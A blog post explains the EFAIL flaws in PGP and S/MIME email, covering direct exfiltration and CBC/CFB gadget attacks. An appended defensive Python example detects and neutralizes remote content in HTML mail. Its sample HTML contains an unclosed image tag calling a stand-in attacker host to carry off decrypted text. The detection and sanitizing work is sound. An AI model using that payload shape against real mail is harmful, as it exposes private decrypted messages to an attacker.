Email security has always felt fickle. We often see and hear news about people's emails getting hacked, with vital personal information or important business information lost. Even in government we have seen multiple occasions when high-ranking officials lost access to their email or had it hacked. This goes to show that, no matter your status, in the world of email we are all the same.
Continuing along that line, researchers at Münster University of Applied Sciences have found new ways in which our emails are vulnerable, specifically involving the Pretty Good Privacy (PGP) and S/MIME technologies that encrypt emails.
So what's this new vulnerability? The problem lies in how email clients use plug-ins to decrypt (read) HTML-based emails. As a result, companies and individuals are being encouraged to turn off the affected programs (PGP, S/MIME) and look for an alternative email encryption program.
The vulnerability has been named “EFAIL” and abuses active content rendered within HTML-based emails: things like images, page styles, and other non-text content. However, for the hacker to carry out EFAIL, they must first have their hands on the email, whether through eavesdropping, hacking into the email server, or other means.
So far the attack has been broken down into two methods, which vary depending on the email client in use.
The First Method
The first method of attack is called “Direct Exfiltration” and abuses vulnerabilities in Apple Mail, iOS Mail, and Mozilla Thunderbird. The hacker creates an HTML-based email that is made up of three parts.
Once the new email is complete, the hacker sends it to the victim, and the attack begins.
When the victim receives this email, the email client decrypts the second section (the PGP or S/MIME part) and then combines all three sections into one whole email. Once that is done, the combined content forms a URL that starts with the hacker's address; the client sends a request to that URL to fetch a non-existent image, and that request carries the entire decrypted message to the hacker.
The Second Method
The second form of attack is called the “CBC/CFB Gadget Attack”. It lies in the PGP and S/MIME specifications themselves, so it affects all email clients. For this attack the hacker locates the first block of plaintext that is encrypted in the stolen email and then adds a fake block of text filled with zeroes. The attacker then injects image tags into the zeroed text, creating a single encrypted body part that, when opened by the victim's client, exposes the plaintext to the hacker.
Currently there is no patch for this vulnerability, although there has been talk that one is being produced as we speak. To avoid these problems in the meantime, simply avoid PGP and S/MIME for your email encryption.
Give us a call or send us an email, and let's take a look at your system and its defenses!
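Both methods above depend on the same thing: the mail client fetching remote active content (an image, a stylesheet) when it renders the HTML. The following added example, not part of the original post, shows the client-side check a defender would want: it lists the remote references in an HTML part, flags an image tag whose external src value is never closed (the direct-exfiltration layout), and rewrites every remote reference to a dead scheme so rendering fetches nothing. The sample HTML is constructed for the example; attacker.invalid and cdn.example.invalid are placeholder hosts.

```python
import re

# Constructed sample (not from the post): an HTML mail body containing the kinds of
# active content EFAIL abuses: an external stylesheet, a CSS url(), an external image,
# and an <img src="http://... whose attribute value is never closed in this part, so
# whatever the client appends next (e.g. decrypted text) becomes part of the URL.
SAMPLE_HTML = (
    '<link rel="stylesheet" href="https://cdn.example.invalid/mail.css">\n'
    '<div style="background:url(https://cdn.example.invalid/bg.png)">\n'
    '<img src="https://cdn.example.invalid/logo.png">\n'
    '<img src="http://attacker.invalid/collect?d=\n'
    'text the client would append here\n'
)

# Places where an HTML renderer issues a network request with no user interaction.
# Group 1 captures everything up to the URL scheme so the scheme can be rewritten.
REMOTE_PATTERNS = [
    re.compile(r'''(?i)(\s(?:src|background|poster|data)\s*=\s*["']?)(https?:|//)'''),
    re.compile(r'''(?i)(<link\b[^>]*?\bhref\s*=\s*["']?)(https?:|//)'''),
    re.compile(r'''(?i)(url\(\s*["']?)(https?:|//)'''),
    re.compile(r'''(?i)(@import\s+["']?)(https?:|//)'''),
]
# An <img src="http://... whose value runs to the end of the part without a closing quote.
UNCLOSED_SRC = re.compile(r'''(?i)<img[^>]*\bsrc\s*=\s*["'](?:https?:|//)[^"'>]*$''')


def remote_references(html):
    """Return every remote URL (scheme up to the next quote, paren, '>' or whitespace)."""
    refs = []
    for pat in REMOTE_PATTERNS:
        for m in pat.finditer(html):
            refs.append(re.split(r'''["'()>\s]''', html[m.start(2):], maxsplit=1)[0])
    return refs


def has_unclosed_remote_src(html):
    """True for the direct-exfiltration layout: an external image URL left open at the
    end of the part, so the rendered message continues the URL with the next part."""
    return UNCLOSED_SRC.search(html.rstrip()) is not None


def neutralize_remote_content(html):
    """Prefix each remote reference with a dead scheme so rendering fetches nothing.
    Returns (sanitized_html, number_of_references_rewritten)."""
    total = 0
    for pat in REMOTE_PATTERNS:
        html, n = pat.subn(r'\1blocked:\2', html)
        total += n
    return html, total
```

Run against the sample, the checker reports four remote references and an unclosed external src; after neutralizing, no remote reference remains, which is the "disable remote content" setting that blocks the exfiltration channel for both methods.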